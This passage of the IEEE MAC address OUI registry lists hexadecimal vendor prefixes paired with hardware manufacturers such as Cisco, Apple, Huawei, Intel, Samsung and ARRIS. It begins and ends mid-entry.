Ltd A0B437 GD Mission Systems E09861 Motorola Mobility LLC, a Lenovo Company 9C8ECD Amcrest Technologies FCA89A Sunitec Enterprise Co.,Ltd 1C7B23 Qingdao Hisense Communications Co.,Ltd. 005F86 Cisco Systems, Inc 381DD9 FN-LINK TECHNOLOGY LIMITED 1CB9C4 Ruckus Wireless 48C663 GTO Access Systems LLC FC3D93 LONGCHEER TELECOMMUNICATION LIMITED 00F663 Cisco Systems, Inc 000763 Sunniwell Cyber Tech. Co., Ltd. E41D2D Mellanox Technologies, Inc. 240A11 TCT mobile ltd D8E56D TCT mobile ltd 540593 WOORI ELEC Co.,Ltd C02FF1 Volta Networks E8A7F2 sTraffic 001F20 Logitech Europe SA 1C6E76 Quarion Technology Inc 0062EC Cisco Systems, Inc CC167E Cisco Systems, Inc CC500A Fiberhome Telecommunication Technologies Co.,LTD D046DC Southwest Research Institute C46AB7 Xiaomi Communications Co Ltd 000AED HARTING Electronics GmbH 0CDA41 Hangzhou H3C Technologies Co., Limited 74258A Hangzhou H3C Technologies Co., Limited 70A2B3 Apple, Inc. F40F24 Apple, Inc. 4C57CA Apple, Inc. 90C1C6 Apple, Inc. 741F4A Hangzhou H3C Technologies Co., Limited A0B662 Acutvista Innovation Co., Ltd. E42F56 OptoMET GmbH F8DA0C Hon Hai Precision Ind. Co.,Ltd. 1C1B0D GIGA-BYTE TECHNOLOGY CO.,LTD. 48E9F1 Apple, Inc. 903809 Ericsson AB 002238 LOGIPLUS 3497F6 ASUSTek COMPUTER INC. 50680A HUAWEI TECHNOLOGIES CO.,LTD 00168F GN Netcom A/S 487ADA Hangzhou H3C Technologies Co., Limited 00A006 IMAGE DATA PROCESSING SYSTEM GROUP C83F26 Microsoft Corporation 000C49 Dangaard Telecom Denmark A/S 1078D2 Elitegroup Computer Systems Co.,Ltd. 002197 Elitegroup Computer Systems Co.,Ltd. 001E90 Elitegroup Computer Systems Co.,Ltd. 0022B1 Elbit Systems Ltd. 0000B4 Edimax Technology Co. Ltd. A08CFD Hewlett Packard 001F45 Enterasys 000E03 Emulex Corporation 000D87 Elitegroup Computer Systems Co.,Ltd. E4F3F5 SHENZHEN MERCURY COMMUNICATION TECHNOLOGIES CO.,LTD. 60B387 Synergics Technologies GmbH A4D8CA HONG KONG WATER WORLD TECHNOLOGY CO. LIMITED 8019FE JianLing Technology CO., LTD 60B4F7 Plume Design Inc BC9889 Fiberhome Telecommunication Technologies Co.,LTD 24615A China Mobile Group Device Co.,Ltd. FC084A FUJITSU LIMITED 44650D Amazon Technologies Inc. FC3F7C HUAWEI TECHNOLOGIES CO.,LTD 384C4F HUAWEI TECHNOLOGIES CO.,LTD 0CBF3F Shenzhen Lencotion Technology Co.,Ltd 00CAE5 Cisco Systems, Inc 004268 Cisco Systems, Inc 4883C7 Sagemcom Broadband SAS 405EE1 Shenzhen H&T Intelligent Control Co.,Ltd. 002578 JSC "Concern "Sozvezdie" 900325 HUAWEI TECHNOLOGIES CO.,LTD 98E7F5 HUAWEI TECHNOLOGIES CO.,LTD 04A316 Texas Instruments D4F207 DIAODIAO(Beijing)Technology CO.,Ltd D4AD2D Fiberhome Telecommunication Technologies Co.,LTD F08CFB Fiberhome Telecommunication Technologies Co.,LTD 48555F Fiberhome Telecommunication Technologies Co.,LTD 30B49E TP-LINK TECHNOLOGIES CO.,LTD. 34E70B HAN Networks Co., Ltd 007888 Cisco Systems, Inc 40163B Samsung Electronics Co.,Ltd 001706 Techfaithwireless Communication Technology Limited. 140C5B PLNetworks 50FF99 IEEE Registration Authority 84E323 Green Wave Telecommunication SDN BHD C83870 Samsung Electronics Co.,Ltd 1C553A QianGua Corp. 008E73 Cisco Systems, Inc A09D91 SoundBridge 40B688 LEGIC Identsystems AG 9CD48B Innolux Technology Europe BV 00351A Cisco Systems, Inc 085BDA CliniCare LTD 1CC035 PLANEX COMMUNICATIONS INC. 34543C TAKAOKA TOKO CO.,LTD. 9C9D5D Raden Inc DC4D23 MRV Comunications 0023B3 Lyyn AB 248A07 Mellanox Technologies, Inc. 402E28 MiXTelematics 6C8FB5 Microsoft Mobile Oy 583277 Reliance Communications LLC 0015C1 Sony Interactive Entertainment Inc. 90A62F NAVER C0C522 ARRIS Group, Inc. 1C9E46 Apple, Inc. 9C4FDA Apple, Inc. C4E510 Mechatro, Inc. 00AF1F Cisco Systems, Inc C0CCF8 Apple, Inc. 803896 SHARP Corporation 0060EC HERMARY OPTO ELECTRONICS INC. 347E39 Nokia Danmark A/S 0025D0 Nokia Danmark A/S 00180F Nokia Danmark A/S C8979F Nokia Corporation 8489AD Apple, Inc. 0021FC Nokia Danmark A/S 001F5D Nokia Danmark A/S 001F01 Nokia Danmark A/S 001BEE Nokia Danmark A/S 001979 Nokia Danmark A/S 001A7F GCI Science & Technology Co.,LTD 0024D4 FREEBOX SAS AC3A7A Roku, Inc. B83E59 Roku, Inc. DC3A5E Roku, Inc. 001A73 Gemtek Technology Co., Ltd. 00904B Gemtek Technology Co., Ltd. 00507F DrayTek Corp. ECF35B Nokia Corporation 544408 Nokia Corporation 3CC243 Nokia Corporation 647791 Samsung Electronics Co.,Ltd 9CE6E7 Samsung Electronics Co.,Ltd 9C0298 Samsung Electronics Co.,Ltd BCD11F Samsung Electronics Co.,Ltd F4428F Samsung Electronics Co.,Ltd 446D6C Samsung Electronics Co.,Ltd 00F46F Samsung Electronics Co.,Ltd 54FA3E Samsung Electronics Co.,Ltd 0C8910 Samsung Electronics Co.,Ltd 78ABBB Samsung Electronics Co.,Ltd 0090A2 CyberTAN Technology Inc. 0090D6 Crystal Group, Inc. 28987B Samsung Electronics Co.,Ltd 0C715D Samsung Electronics Co.,Ltd D8C4E9 Samsung Electronics Co.,Ltd 7C1CF1 HUAWEI TECHNOLOGIES CO.,LTD 78F557 HUAWEI TECHNOLOGIES CO.,LTD E02861 HUAWEI TECHNOLOGIES CO.,LTD D0D04B HUAWEI TECHNOLOGIES CO.,LTD 480031 HUAWEI TECHNOLOGIES CO.,LTD 4C09D4 Arcadyan Technology Corporation FCB4E6 ASKEY COMPUTER CORP C8FF28 Liteon Technology Corporation D476EA zte corporation 9C80DF Arcadyan Technology Corporation 002308 Arcadyan Technology Corporation 880355 Arcadyan Technology Corporation 34BB1F BlackBerry RTS 406F2A BlackBerry RTS 00175A Cisco Systems, Inc 001018 Broadcom 18C086 Broadcom 0896D7 AVM GmbH 506A03 NETGEAR 100D7F NETGEAR B81619 ARRIS Group, Inc. B077AC ARRIS Group, Inc. 002493 ARRIS Group, Inc. 002641 ARRIS Group, Inc. 504A6E NETGEAR E0469A NETGEAR 30469A NETGEAR 0015D0 ARRIS Group, Inc. 001596 ARRIS Group, Inc. 04E676 AMPAK Technology, Inc. 0022F4 AMPAK Technology, Inc. 001DBA Sony Corporation 0024BE Sony Corporation F0272D Amazon Technologies Inc. 84D6D0 Amazon Technologies Inc. 0CFE45 Sony Interactive Entertainment Inc. 2016D8 Liteon Technology Corporation E8617E Liteon Technology Corporation 18CF5E Liteon Technology Corporation 2421AB Sony Corporation B8F934 Sony Corporation 8C6422 Sony Corporation E063E5 Sony Corporation F8D0AC Sony Interactive Entertainment Inc. A4ED4E ARRIS Group, Inc. 00211E ARRIS Group, Inc. 002180 ARRIS Group, Inc. 0023A2 ARRIS Group, Inc. 0023ED ARRIS Group, Inc. 001B52 ARRIS Group, Inc. 001E8D ARRIS Group, Inc. 001BDD ARRIS Group, Inc. 001D6B ARRIS Group, Inc. 001DBE ARRIS Group, Inc. 0012C9 ARRIS Group, Inc. 00192C ARRIS Group, Inc. 00195E ARRIS Group, Inc. 001A1B ARRIS Group, Inc. 000CE5 ARRIS Group, Inc. 0003E0 ARRIS Group, Inc. 20E564 ARRIS Group, Inc. 90B134 ARRIS Group, Inc. 40B7F3 ARRIS Group, Inc. 000FDE Sony Corporation 001B59 Sony Corporation 002298 Sony Corporation 001A66 ARRIS Group, Inc. 001A77 ARRIS Group, Inc. 0017E2 ARRIS Group, Inc. 001675 ARRIS Group, Inc. 985FD3 Microsoft Corporation 18E3BC TCT mobile ltd CC1FC4 InVue 5C36B8 TCL King Electrical Appliances (Huizhou) Co., Ltd 00AA01 Intel Corporation 00AA00 Intel Corporation 00C2C6 Intel Corporate 5CD2E4 Intel Corporate 28B2BD Intel Corporate 00006E Artisoft Inc. 00DA55 Cisco Systems, Inc E0B2F1 FN-LINK TECHNOLOGY LIMITED 0C4C39 MitraStar Technology Corp. 002243 AzureWave Technology Inc. 605BB4 AzureWave Technology Inc. 64D954 Taicang T&W Electronics 00247B Actiontec Electronics, Inc 0004E3 Accton Technology Corp 0010B5 Accton Technology Corp 001974 16063 18FE34 Espressif Inc. 00D0C9 ADVANTECH CO., LTD. 6487D7 ADB Broadband Italia 38229D ADB Broadband Italia A4526F ADB Broadband Italia 74888B ADB Broadband Italia 008C54 ADB Broadband Italia 448723 HOYA SERVICE CORPORATION D86C02 Huaqin Telecom Technology Co.,Ltd 60BEB5 Motorola Mobility LLC, a Lenovo Company F8F1B6 Motorola Mobility LLC, a Lenovo Company F4F1E1 Motorola Mobility LLC, a Lenovo Company 9CD917 Motorola Mobility LLC, a Lenovo Company 9068C3 Motorola Mobility LLC, a Lenovo Company 3C197D Ericsson AB 247C4C Herman Miller E46F13 D-Link International 3CFDFE Intel Corporate A4C494 Intel Corporate 902E1C Intel Corporate A434D9 Intel Corporate 64D4DA Intel Corporate 4025C2 Intel Corporate 502DA2 Intel Corporate 78929C Intel Corporate DCA971 Intel Corporate 58946B Intel Corporate 0024D7 Intel Corporate 0024D6 Intel Corporate 001DE0 Intel Corporate A0A8CD Intel Corporate 4C79BA Intel Corporate 84A6C8 Intel Corporate 5891CF Intel Corporate 0C8BFD Intel Corporate 843A4B Intel Corporate 5C514F Intel Corporate A44E31 Intel Corporate 4CEB42 Intel Corporate F81654 Intel Corporate 606C66 Intel Corporate 4C8093 Intel Corporate AC7289 Intel Corporate 448500 Intel Corporate 0CD292 Intel Corporate 685D43 Intel Corporate A0369F Intel Corporate 34EF44 2Wire Inc B0E754 2Wire Inc B8E625 2Wire Inc 5CC5D4 Intel Corporate 001E64 Intel Corporate 00215C Intel Corporate 00216B Intel Corporate 0022FB Intel Corporate 001517 Intel Corporate 001D5A 2Wire Inc 00253C 2Wire Inc 34B1F7 Texas Instruments 2CFD37 Blue Calypso, Inc. 0C6127 Actiontec Electronics, Inc 3CD92B Hewlett Packard 1C4419 TP-LINK TECHNOLOGIES CO.,LTD. 5C353B Compal Broadband Networks, Inc. 00604C Sagemcom Broadband SAS 001F95 Sagemcom Broadband SAS 28FAA0 vivo Mobile Communication Co., Ltd. ECDF3A vivo Mobile Communication Co., Ltd. F42981 vivo Mobile Communication Co., Ltd. 84F6FA Miovision Technologies Incorporated 70106F Hewlett Packard Enterprise F8E71E Ruckus Wireless 08863B Belkin International Inc. 2C56DC ASUSTek COMPUTER INC. 002348 Sagemcom Broadband SAS 002691 Sagemcom Broadband SAS 988B5D Sagemcom Broadband SAS 90013B Sagemcom Broadband SAS 7C034C Sagemcom Broadband SAS 6C2E85 Sagemcom Broadband SAS 94FEF4 Sagemcom Broadband SAS 00F871 Demant A/S F4FC32 Texas Instruments 90D7EB Texas Instruments 78DEE4 Texas Instruments 001833 Texas Instruments 001834 Texas Instruments 0017E3 Texas Instruments 001830 Texas Instruments 0023D4 Texas Instruments C0E422 Texas Instruments D00790 Texas Instruments 3C7DB1 Texas Instruments 001783 Texas Instruments FCFFAA IEEE Registration Authority 3898D8 MERITECH CO.,LTD 9486CD SEOUL ELECTRONICS&TELECOM 3897D6 Hangzhou H3C Technologies Co., Limited BC4434 Shenzhen TINNO Mobile Technology Corp. 04BF6D Zyxel Communications Corporation CC46D6 Cisco Systems, Inc 0041D2 Cisco Systems, Inc 2CAB00 HUAWEI TECHNOLOGIES CO.,LTD A8CA7B HUAWEI TECHNOLOGIES CO.,LTD 2435CC Zhongshan Scinan Internet of Things Co.,Ltd. 2C3033 NETGEAR 0CD746 Apple, Inc. 60A37D Apple, Inc. 68DBCA Apple, Inc. 086698 Apple, Inc. BC5436 Apple, Inc. 044BED Apple, Inc. 6C8DC1 Apple, Inc. 84ACFB Crouzet Automatismes 7CBB8A Nintendo Co., Ltd. 002191 D-Link Corporation ACF1DF D-Link International BCF685 D-Link International 78542E D-Link International C4A81D D-Link International F88FCA Google, Inc. 8896B6 Global Fire Equipment S.A. 88B8D0 Dongguan Koppo Electronic Co.,Ltd 601971 ARRIS Group, Inc. 58AC78 Cisco Systems, Inc 001601 BUFFALO.INC 7403BD BUFFALO.INC B8FC9A Le Shi Zhi Xin Electronic Technology (Tianjin) Limited 0018FE Hewlett Packard 001A4B Hewlett Packard 5C571A ARRIS Group, Inc. E8892C ARRIS Group, Inc. 780AC7 Baofeng TV Co., Ltd. 000D0B BUFFALO.INC 001D73 BUFFALO.INC 1CA770 SHENZHEN CHUANGWEI-RGB ELECTRONICS CO.,LTD 001111 Intel Corporation 001302 Intel Corporate D40598 ARRIS Group, Inc. E83381 ARRIS Group, Inc. 8C7F3B ARRIS Group, Inc. 3C36E4 ARRIS Group, Inc. 1C1B68 ARRIS Group, Inc. 000423 Intel Corporation 94877C ARRIS Group, Inc. 407009 ARRIS Group, Inc. 083E0C ARRIS Group, Inc. 207355 ARRIS Group, Inc. F8EDA5 ARRIS Group, Inc. 5465DE ARRIS Group, Inc. 6CCA08 ARRIS Group, Inc. 002481 Hewlett Packard 000F61 Hewlett Packard 0014C2 Hewlett Packard A4516F Microsoft Mobile Oy FC64BA Xiaomi Communications Co Ltd 8CAB8E Shanghai Feixun Communication Co.,Ltd. D40B1A HTC Corporation 945330 Hon Hai Precision Ind. Co.,Ltd. A08D16 HUAWEI TECHNOLOGIES CO.,LTD 9060F1 Apple, Inc. F8D111 TP-LINK TECHNOLOGIES CO.,LTD. C44044 RackTop Systems Inc. 4CA161 Rain Bird Corporation 4CD08A HUMAX Co., Ltd. CC4EEC HUMAX Co., Ltd. 403DEC HUMAX Co., Ltd. EC4D47 HUAWEI TECHNOLOGIES CO.,LTD 00242B Hon Hai Precision Ind. Co.,Ltd. 542758 Motorola (Wuhan) Mobility Technologies Communication Co., Ltd. A45D36 Hewlett Packard F0921C Hewlett Packard A0481C Hewlett Packard A01D48 Hewlett Packard 40A8F0 Hewlett Packard 8851FB Hewlett Packard 082E5F Hewlett Packard E4115B Hewlett Packard 28924A Hewlett Packard 00805F Hewlett Packard 288023 Hewlett Packard CC3E5F Hewlett Packard D89D67 Hewlett Packard 480FCF Hewlett Packard B0487A TP-LINK TECHNOLOGIES CO.,LTD. 940C6D TP-LINK TECHNOLOGIES CO.,LTD. 647002 TP-LINK TECHNOLOGIES CO.,LTD. 10FEED TP-LINK TECHNOLOGIES CO.,LTD. 645601 TP-LINK TECHNOLOGIES CO.,LTD. 2C088C HUMAX Co., Ltd. 1C994C Murata Manufacturing Co., Ltd. F02765 Murata Manufacturing Co., Ltd. 5CF8A1 Murata Manufacturing Co., Ltd. 44A7CF Murata Manufacturing Co., Ltd. 0013E0 Murata Manufacturing Co., Ltd. 08181A zte corporation 001E73 zte corporation 0015EB zte corporation 001C25 Hon Hai Precision Ind. Co.,Ltd. 00197E Hon Hai Precision Ind. Co.,Ltd. 90FBA6 Hon Hai Precision Ind. Co.,Ltd. 4437E6 Hon Hai Precision Ind. Co.,Ltd. CCAF78 Hon Hai Precision Ind. Co.,Ltd. F4B7E2 Hon Hai Precision Ind. Co.,Ltd. 785968 Hon Hai Precision Ind. Co.,Ltd. ECCB30 HUAWEI TECHNOLOGIES CO.,LTD F4DCF9 HUAWEI TECHNOLOGIES CO.,LTD EC26CA TP-LINK TECHNOLOGIES CO.,LTD. 9471AC TCT mobile ltd 000480 Brocade Communications Systems LLC 000CDB Brocade Communications Systems LLC 00664B HUAWEI TECHNOLOGIES CO.,LTD 9CC172 HUAWEI TECHNOLOGIES CO.,LTD 247F3C HUAWEI TECHNOLOGIES CO.,LTD 581F28 HUAWEI TECHNOLOGIES CO.,LTD C07009 HUAWEI TECHNOLOGIES CO.,LTD 8038BC HUAWEI TECHNOLOGIES CO.,LTD 001BED Brocade Communications Systems LLC 000533 Brocade Communications Systems LLC 006069 Brocade Communications Systems LLC 0060DF Brocade Communications Systems LLC 000088 Brocade Communications Systems LLC C4072F HUAWEI TECHNOLOGIES CO.,LTD F48E92 HUAWEI TECHNOLOGIES CO.,LTD 241FA0 HUAWEI TECHNOLOGIES CO.,LTD F80113 HUAWEI TECHNOLOGIES CO.,LTD A49947 HUAWEI TECHNOLOGIES CO.,LTD C8D15E HUAWEI TECHNOLOGIES CO.,LTD F4559C HUAWEI TECHNOLOGIES CO.,LTD 80B686 HUAWEI TECHNOLOGIES CO.,LTD 10C61F HUAWEI TECHNOLOGIES CO.,LTD CC96A0 HUAWEI TECHNOLOGIES CO.,LTD 44322A Avaya Inc 7038EE Avaya Inc 703018 Avaya Inc 34CDBE HUAWEI TECHNOLOGIES CO.,LTD D8490B HUAWEI TECHNOLOGIES CO.,LTD 080028 Texas Instruments 405FC2 Texas Instruments 20CD39 Texas Instruments B4994C Texas Instruments EC24B8 Texas Instruments 7CEC79 Texas Instruments 689E19 Texas Instruments E0E5CF Texas Instruments 68DFDD Xiaomi Communications Co Ltd 98FAE3 Xiaomi Communications Co Ltd F0B429 Xiaomi Communications Co Ltd 00107B Cisco Systems, Inc 0050E2 Cisco Systems, Inc 7054F5 HUAWEI TECHNOLOGIES CO.,LTD 9017AC HUAWEI TECHNOLOGIES CO.,LTD 18C58A HUAWEI TECHNOLOGIES CO.,LTD 308730 HUAWEI TECHNOLOGIES CO.,LTD 9C28EF HUAWEI TECHNOLOGIES CO.,LTD C057BC Avaya Inc 64A7DD Avaya Inc A4251B Avaya Inc 646A52 Avaya Inc 00173B Cisco Systems, Inc 001E8C ASUSTek COMPUTER INC. 0013D4 ASUSTek COMPUTER INC. 20CF30 ASUSTek COMPUTER INC. 00248C ASUSTek COMPUTER INC. 002354 ASUSTek COMPUTER INC. 4C4E35 Cisco Systems, Inc BC1665 Cisco Systems, Inc F872EA Cisco Systems, Inc D0C789 Cisco Systems, Inc F84F57 Cisco Systems, Inc 7C69F6 Cisco Systems, Inc 0090A6 Cisco Systems, Inc 009086 Cisco Systems, Inc 005080 Cisco Systems, Inc 005073 Cisco Systems, Inc 8478AC Cisco Systems, Inc 04DAD2 Cisco Systems, Inc F02929 Cisco Systems, Inc 20BBC0 Cisco Systems, Inc 001BD7 Cisco SPVTG E4D3F1 Cisco Systems, Inc 006083 Cisco Systems, Inc 006009 Cisco Systems, Inc 00067C Cisco Systems, Inc 00E0F7 Cisco Systems, Inc 00900C Cisco Systems, Inc 00905F Cisco Systems, Inc 00100B Cisco Systems, Inc 78DA6E Cisco Systems, Inc 1C872C ASUSTek COMPUTER INC. 60182E ShenZhen Protruly Electronic Ltd co. C4143C Cisco Systems, Inc 3C08F6 Cisco Systems, Inc 501CBF Cisco Systems, Inc B000B4 Cisco Systems, Inc 544A00 Cisco Systems, Inc 00E16D Cisco Systems, Inc 24374C Cisco SPVTG F45FD4 Cisco SPVTG 2CABA4 Cisco SPVTG 1C6E4C Logistic Service & Engineering Co.,Ltd E4AA5D Cisco Systems, Inc B8782E Apple, Inc. 000502 Apple, Inc. 000A95 Apple, Inc. 001124 Apple, Inc. 002241 Apple, Inc. 78BAF9 Cisco Systems, Inc 0022CE Cisco SPVTG 000F66 Cisco-Linksys, LLC 34BDC8 Cisco Systems, Inc DCEB94 Cisco Systems, Inc 84B517 Cisco Systems, Inc 188B9D Cisco Systems, Inc 00264A Apple, Inc. 041E64 Apple, Inc. 90840D Apple, Inc. E80688 Apple, Inc. E0899D Cisco Systems, Inc C47295 Cisco Systems, Inc E0D173 Cisco Systems, Inc 2CB43A Apple, Inc. 689C70 Apple, Inc. 380F4A Apple, Inc. 3010E4 Apple, Inc. A886DD Apple, Inc. F0C1F1 Apple, Inc. 843835 Apple, Inc. B4F0AB Apple, Inc. 80929F Apple, Inc. 9C04EB Apple, Inc. 5C969D Apple, Inc. A8968A Apple, Inc. F41BA1 Apple, Inc. 9803D8 Apple, Inc. D89E3F Apple, Inc. B8C75D Apple, Inc. 0C74C2 Apple, Inc. 403004 Apple, Inc. 5C95AE Apple, Inc. 842999 Apple, Inc. 74E2F5 Apple, Inc. E0C97A Apple, Inc. 444C0C Apple, Inc. 7CC537 Apple, Inc. 78CA39 Apple, Inc. 18E7F4 Apple, Inc. 70CD60 Apple, Inc. 8C7B9D Apple, Inc. 041552 Apple, Inc. CC785F Apple, Inc. 88CB87 Apple, Inc. 685B35 Apple, Inc. 60C547 Apple, Inc. 68A86D Apple, Inc. 7CC3A1 Apple, Inc. 7073CB Apple, Inc. 8C006D Apple, Inc. 907240 Apple, Inc. F82793 Apple, Inc. EC852F Apple, Inc. 00F4B9 Apple, Inc. 84B153 Apple, Inc. E06678 Apple, Inc. 48D705 Apple, Inc. 68D93C Apple, Inc. 00F76F Apple, Inc. C88550 Apple, Inc. E0B52D Apple, Inc. 6C94F8 Apple, Inc. 908D6C Apple, Inc. B8098A Apple, Inc. 7014A6 Apple, Inc. 985AEB Apple, Inc. 78D75F Apple, Inc. C0CECD Apple, Inc. 4C7C5F Apple, Inc. 68644B Apple, Inc. C81EE7 Apple, Inc. A43135 Apple, Inc. 60D9C7 Apple, Inc. 3CAB8E Apple, Inc. 609217 Apple, Inc. F44B2A Cisco SPVTG C4EF70 Home Skinovations 746F19 ICARVISIONS (SHENZHEN) TECHNOLOGY CO., LTD. A0F9E0 VIVATEL COMPANY LIMITED 2CAE2B Samsung Electronics Co.,Ltd C4ADF1 GOPEACE Inc. 58FC73 Arria Live Media, Inc. 0C1A10 Acoustic Stream E81363 Comstock RD, Inc. 741865 Shanghai DareGlobal Technologies Co.,Ltd 7C5A67 JNC Systems, Inc. C869CD Apple, Inc. A4B805 Apple, Inc. 90C99B Tesorion Nederland B.V. 5CADCF Apple, Inc. BC6C21 Apple, Inc. F8C372 TSUZUKI DENKI D47208 Bragi GmbH 5CE3B6 Fiberhome Telecommunication Technologies Co.,LTD 080A4E Planet Bingo® — 3rd Rock Gaming® B49D0B BQ 3C8CF8 TRENDnet, Inc. 780541 Queclink Wireless Solutions Co., Ltd 044169 GoPro C02DEE Cuff ACBC32 Apple, Inc. 544E90 Apple, Inc. A4A6A9 Private 8C10D4 Sagemcom Broadband SAS F898B9 HUAWEI TECHNOLOGIES CO.,LTD 5CB559 CNEX Labs B83A9D Alarm.com 9023EC Availink, Inc. 441CA8 Hon Hai Precision Ind. Co.,Ltd. 6858C5 ZF TRW Automotive 881B99 SHENZHEN XIN FEI JIA ELECTRONIC CO. LTD. 6CEBB2 Dongguan Sen DongLv Electronics Co.,Ltd F40E22 Samsung Electronics Co.,Ltd 3C7A8A ARRIS Group, Inc. C01173 Samsung Electronics Co.,Ltd 7853F2 Roxton Systems Ltd. BCE63F Samsung Electronics Co.,Ltd 7C9122 Samsung Electronics Co.,Ltd A87285 IDT, INC. F4E926 Tianjin Zanpu Technology Inc. 906F18 Private 98CB27 Galore Networks Pvt. Ltd. CC794A BLU Products Inc. 2CFCE4 CTEK Sweden AB 2CA539 Parallel Wireless, Inc 245BF0 Liteon, Inc. 94D859 TCT mobile ltd E855B4 SAI Technology Inc. 340CED Moduel AB 9CA69D Whaley Technology Co.Ltd 5853C0 Beijing Guang Runtong Technology Development Company co.,Ltd 247260 IOTTECH Corp E8F2E2 LG Innotek 50DF95 Lytx B4293D Shenzhen Urovo Technology Co.,Ltd. 54FF82 Davit Solution co. 2827BF Samsung Electronics Co.,Ltd 20635F Abeeway 083A5C Junilab, Inc. B8B3DC DEREK (SHAOGUAN) LIMITED 188EF9 G2C Co. Ltd. F4B8A7 zte corporation 300C23 zte corporation C0B713 Beijing Xiaoyuer Technology Co. Ltd. C47D46 FUJITSU LIMITED 1005B1 ARRIS Group, Inc. 9CB6D0 Rivet Networks 40B89A Hon Hai Precision Ind. Co.,Ltd. 1CB72C ASUSTek COMPUTER INC. 40B837 Sony Corporation 6CE01E Modcam AB 74852A PEGATRON CORPORATION 609C9F Brocade Communications Systems LLC A8827F CIBN Oriental Network(Beijing) CO.,Ltd B8C3BF Henan Chengshi NetWork Technology Co.,Ltd 4CEEB0 SHC Netzwerktechnik GmbH 800184 HTC Corporation 702A7D EpSpot AB 4CAE31 ShengHai Electronics (Shenzhen) Ltd F4E9D4 QLogic Corporation 4CB76D Novi Security 44C69B Wuhan Feng Tian Information Network CO.,LTD C02567 Nexxt Solutions FCE33C HUAWEI TECHNOLOGIES CO.,LTD 185D9A BobjGear LLC 44F436 zte corporation E807BF SHENZHEN BOOMTECH INDUSTRY CO.,LTD 84F129 Metrascale Inc. B89ACD ELITE OPTOELECTRONIC(ASIA)CO.,LTD D468BA Shenzhen Sundray Technologies Company Limited 086266 ASUSTek COMPUTER INC. 9C3066 RWE Effizienz GmbH 700136 FATEK Automation Corporation FCA22A PT. Callysta Multi Engineering 18BDAD L-TECH CORPORATION 60E6BC Sino-Telecom Technology Co.,Ltd. A45602 fenglian Technology Co.,Ltd. C8C50E Shenzhen Primestone Network Technologies.Co., Ltd. D06A1F BSE CO.,LTD. E076D0 AMPAK Technology, Inc. D4522A TangoWiFi.com 44962B Aidon Oy B008BF Vital Connect, Inc. D048F3 DATTUS Inc 6CF5E8 Mooredoll Inc. A89008 Beijing Yuecheng Technology Co. Ltd. A48CDB Lenovo D85DE2 Hon Hai Precision Ind. Co.,Ltd. 3C912B Vexata Inc 346C0F Pramod Telecom Pvt. Ltd B0E03C TCT mobile ltd BC1485 Samsung Electronics Co.,Ltd 9C6C15 Microsoft Corporation 183864 CAP-TECH INTERNATIONAL CO., LTD. C0335E Microsoft F01E34 ORICO Technologies Co., Ltd DCE026 Patrol Tag, Inc B40566 SP Best Corporation Co., LTD. 1CC72D Shenzhen Huapu Digital CO.,Ltd 8CBFA6 Samsung Electronics Co.,Ltd C8A823 Samsung Electronics Co.,Ltd B0C559 Samsung Electronics Co.,Ltd FCDC4A G-Wearables Corp. 1C14B3 Airwire Technologies 94E2FD Boge Kompressoren OTTO Boge GmbH & Co. KG F42C56 SENOR TECH CO LTD 48C093 Xirrus, Inc. A0C2DE Costar Video Systems 88E161 Art Beijing Science and Technology Development Co., Ltd. 00A509 WigWag Inc. D0929E Microsoft Corporation 84CFBF Fairphone ACD1B8 Hon Hai Precision Ind. Co.,Ltd. 7491BD Four systems Co.,Ltd. D43266 Fike Corporation 900CB4 Alinket Electronic Technology Co., Ltd 60F189 Murata Manufacturing Co., Ltd. 742EFC DirectPacket Research, Inc, 445ECD Razer Inc 4CA928 Insensi E8447E Bitdefender SRL B0495F OMRON HEALTHCARE Co., Ltd. DC0914 Talk-A-Phone Co. 78312B zte corporation BC52B4 Nokia 9405B6 Liling FullRiver Electronics & Technology Ltd 00A2F5 Guangzhou Yuanyun Network Technology Co.,Ltd 1008B1 Hon Hai Precision Ind. Co.,Ltd. E48C0F Discovery Insure 10FACE Reacheng Communication Technology Co.,Ltd F0FE6B Shanghai High-Flying Electronics Technology Co., Ltd 3CAE69 ESA Elektroschaltanlagen Grimma GmbH E42354 SHENZHEN FUZHI SOFTWARE TECHNOLOGY CO.,LTD 9470D2 WINFIRM TECHNOLOGY A44AD3 ST Electronics(Shanghai) Co.,Ltd 3438AF Inlab Networks GmbH C81B6B Innova Security 00F3DB WOO Sports B4A828 Shenzhen Concox Information Technology Co., Ltd 44CE7D SFR 344DEA zte corporation 94BF95 Shenzhen Coship Electronics Co., Ltd EC0EC4 Hon Hai Precision Ind. Co.,Ltd. 8C18D9 Shenzhen RF Technology Co., Ltd C4BD6A SKF GmbH 7CB177 Satelco AG CC3080 VAIO Corporation 187117 eta plus electronic gmbh 4C16F1 zte corporation D8FB11 AXACORE 0809B6 Masimo Corp 4CF5A0 Scalable Network Technologies Inc 30FAB7 Tunai Creative D0A0D6 ChengDu TD Tech ECB907 CloudGenix Inc F42833 MMPC Inc. 4C83DE Cisco SPVTG A81374 Panasonic Corporation AVC Networks Company 50BD5F TP-LINK TECHNOLOGIES CO.,LTD. 600292 PEGATRON CORPORATION B4B859 Texa Spa 5CF9F0 Atomos Engineering P/L E4C62B Airware EC1D7F zte corporation AC3870 Lenovo Mobile Communication Technology Ltd. C401CE PRESITION (2000) CO., LTD. 587BE9 AirPro Technology India Pvt. Ltd 4CE933 RailComm, LLC 987E46 Emizon Networks Limited 3C46D8 TP-LINK TECHNOLOGIES CO.,LTD. 147590 TP-LINK TECHNOLOGIES CO.,LTD. 28A5EE Shenzhen SDGI CATV Co., Ltd 4CBC42 Shenzhen Hangsheng Electronics Co.,Ltd. 70F196 Actiontec Electronics, Inc 188219 Alibaba Cloud Computing Ltd. BC4E5D ZhongMiao Technology Co., Ltd. 7C6AC3 GatesAir, Inc 0C8C8F Kamo Technology Limited A4A4D3 Bluebank Communication Technology Co.Ltd A8329A Digicom Futuristic Technologies Ltd. F4D032 Yunnan Ideal Information&Technology.,Ltd F4F646 Dediprog Technology Co. Ltd. 3C189F Nokia Corporation 28E6E9 SIS Sat Internet Services GmbH F4FD2B ZOYI Company 083D88 Samsung Electronics Co.,Ltd 702DD1 Newings Communication CO., LTD. 84850A Hella Sonnen- und Wetterschutztechnik GmbH 30595B streamnow AG 08CD9B samtec automotive electronics & software GmbH 5C5BC2 YIK Corporation 109266 Samsung Electronics Co.,Ltd 045C8E gosund GROUP CO.,LTD 7CC4EF Devialet D85DFB Private DCF110 Nokia Corporation 608F5C Samsung Electronics Co.,Ltd 908C63 GZ Weedong Networks Technology Co. , Ltd 142BD6 Guangdong Appscomm Co.,Ltd F84A73 EUMTECH CO., LTD E8EF89 OPMEX Tech. 300D2A Zhejiang 